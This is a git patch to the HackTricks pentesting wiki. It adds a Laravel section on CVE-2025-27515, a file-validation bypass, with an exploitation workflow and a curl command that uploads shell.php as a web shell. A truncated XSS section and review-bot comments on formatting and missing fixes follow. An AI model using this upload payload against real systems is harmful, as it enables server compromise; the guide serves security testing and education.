From 39338d2c3012ebb8b4d0b618ae02dee507724f8a Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Mon, 22 Dec 2025 01:54:20 +0000 Subject: [PATCH] Add content from: Research Update: Enhanced src/network-services-pentesting/pe... --- src/SUMMARY.md | 1 + .../inputmethodservice-ime-abuse.md | 1 + .../pentesting-web/laravel.md | 55 +++++++++++++++++++ 3 files changed, 57 insertions(+) diff --git a/src/SUMMARY.md b/src/SUMMARY.md index fdf253b1bef..9ac5c0d0b19 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -375,6 +375,7 @@ - [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md) - [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md) - [In Memory Jni Shellcode Execution](mobile-pentesting/android-app-pentesting/in-memory-jni-shellcode-execution.md) + - [Inputmethodservice Ime Abuse](mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md) - [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md) - [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md) - [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md) diff --git a/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md b/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md index 878d498c40e..8251e907770 100644 --- a/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md +++ b/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md 
@@ -81,3 +81,4 @@ adb shell ime help - **User/MDM**: allowlist trusted keyboards; block unknown IMEs in managed profiles/devices. - **App-side (high risk apps)**: prefer phishing-resistant auth (passkeys/biometrics) and avoid relying on “secret text entry” as a security boundary (a malicious IME sits below the app UI). +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md index 9a85749ac52..315ec716dd1 100644 --- a/src/network-services-pentesting/pentesting-web/laravel.md +++ b/src/network-services-pentesting/pentesting-web/laravel.md 
@@ -134,6 +134,33 @@ email=a@b.c&password=whatever&remember=0xdf --- +## CVE-2025-27515 – Wildcard file validation bypass (`files.*`) + +Laravel 10.0–10.48.28, 11.0.0–11.44.0 and 12.0.0–12.1.0 let crafted multipart requests completely skip any rule attached to `files.*` / `images.*`. The parser that expands wildcard keys could be confused with attacker-controlled placeholders (for example, pre-populating `__asterisk__` segments), so the framework would hydrate `UploadedFile` objects without ever running `image`, `mimes`, `dimensions`, `max`, etc. Once a malicious blob lands in `Storage::putFile*` you can pivot to any of the file-upload primitives already listed in HackTricks (web shells, log poisoning, signed job deserialization, …). + +### Hunting for the pattern + +* Static: `rg -n "files\\.\*" -g"*.php" app/` or inspect `FormRequest` classes for `rules()` returning arrays that contain `files.*`. +* Dynamic: hook `Illuminate\Validation\Validator::validate()` via Xdebug or Laravel Telescope in pre-production to log every request that hits the vulnerable rule. +* Middleware/route review: endpoints bundling multiple files (avatar importers, document portals, drag-n-drop components) tend to trust `files.*`. + +### Practical exploitation workflow + +1. Capture a legitimate upload and replay it in Burp Repeater. +2. Duplicate the same part but alter the field name so it already includes placeholder tokens (e.g., `files[0][__asterisk__payload]`) or nest another array (`files[0][alt][0]`). On vulnerable builds, that second part never gets validated but still becomes an `UploadedFile` entry. +3. Point the forged file to a PHP payload (`shell.php`, `.phar`, polyglot) and force the application to store it in a web-accessible disk (commonly `public/` once `php artisan storage:link` is enabled). 
+ +```bash +curl -sk https://target/upload \ + -F 'files[0]=@ok.png;type=image/png' \ + -F 'files[0][__asterisk__payload]=@shell.php;type=text/plain' \ + -F 'description=lorem' +``` + +Keep fuzzing key names (`files.__dot__0`, `files[0][0]`, `files[0][uuid]` …) until you find one that bypasses the validator but still gets written to disk; patched versions reject these crafted attribute names immediately. + +--- + ## Laravel Tricks ### Debugging mode @@ -145,6 +172,27 @@ For example `http://127.0.0.1:8000/profiles`: This is usually needed for exploiting other Laravel RCE CVEs. +#### CVE-2024-13918 / CVE-2024-13919 – reflected XSS in Whoops debug pages + +* Affected: Laravel 11.9.0–11.35.1 with `APP_DEBUG=true` (either globally or forced via misconfigured env overrides like CVE-2024-52301). +* Primitive: every uncaught exception rendered by Whoops echoes parts of the request/route **without HTML encoding**, so injecting `` / `
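Review bot: the new SUMMARY.md entry title `Inputmethodservice Ime Abuse` reads as filename-derived rather than hand-written; the neighbouring entries that are hand-cased (`Google CTF 2018 - Shall We Play a Game?`, `Install Burp Certificate`) suggest `InputMethodService IME Abuse`, which also matches the Android class name and the acronym. The alphabetical placement between `In Memory Jni Shellcode Execution` and `Insecure In App Update Rce` is correct.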
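Review bot: in the inputmethodservice-ime-abuse.md hunk the added `{{#include ../../banners/hacktricks-training.md}}` line follows the last `- **App-side ...**` bullet with no blank line in between, so whatever the banner file expands to can be parsed as a lazy continuation of that list item instead of a separate block. Insert an empty line before the include so the banner renders on its own, as a closing banner should.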
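Review bot: the CVE-2025-27515 section in laravel.md lists the affected ranges (10.0–10.48.28, 11.0.0–11.44.0, 12.0.0–12.1.0) and says "patched versions reject these crafted attribute names immediately", but never names the first fixed release per branch nor links the advisory, so a reader checking a `composer.lock` cannot tell whether a given build is vulnerable or fixed. Add a short "Fix / detection" line stating the patched releases (or the advisory URL) and suggest `composer show laravel/framework` to compare the installed version against the ranges above. Also, the heading names both `files.*` and `images.*`, but the static-hunting command only greps for `files\.\*`; widen it to `(files|images)\.\*` so the review step matches what the heading claims.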
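Review bot: the CVE-2024-13918 / CVE-2024-13919 hunk is truncated in this capture (the text stops mid-sentence at "so injecting"), and the diffstat's 55 insertions for laravel.md exceed the 48 accounted for by the two visible hunk headers (+27 and +21), so part of this change is not visible and cannot be reviewed here. For the visible part: the "Affected" bullet correctly makes `APP_DEBUG=true` the precondition, but the section gives no mitigation line; since the parent "Debugging mode" text says this state is "usually needed for exploiting other Laravel RCE CVEs", add one sentence stating that upgrading past 11.35.1 and keeping `APP_DEBUG=false` outside local development removes the primitive, so the page stays actionable for defenders.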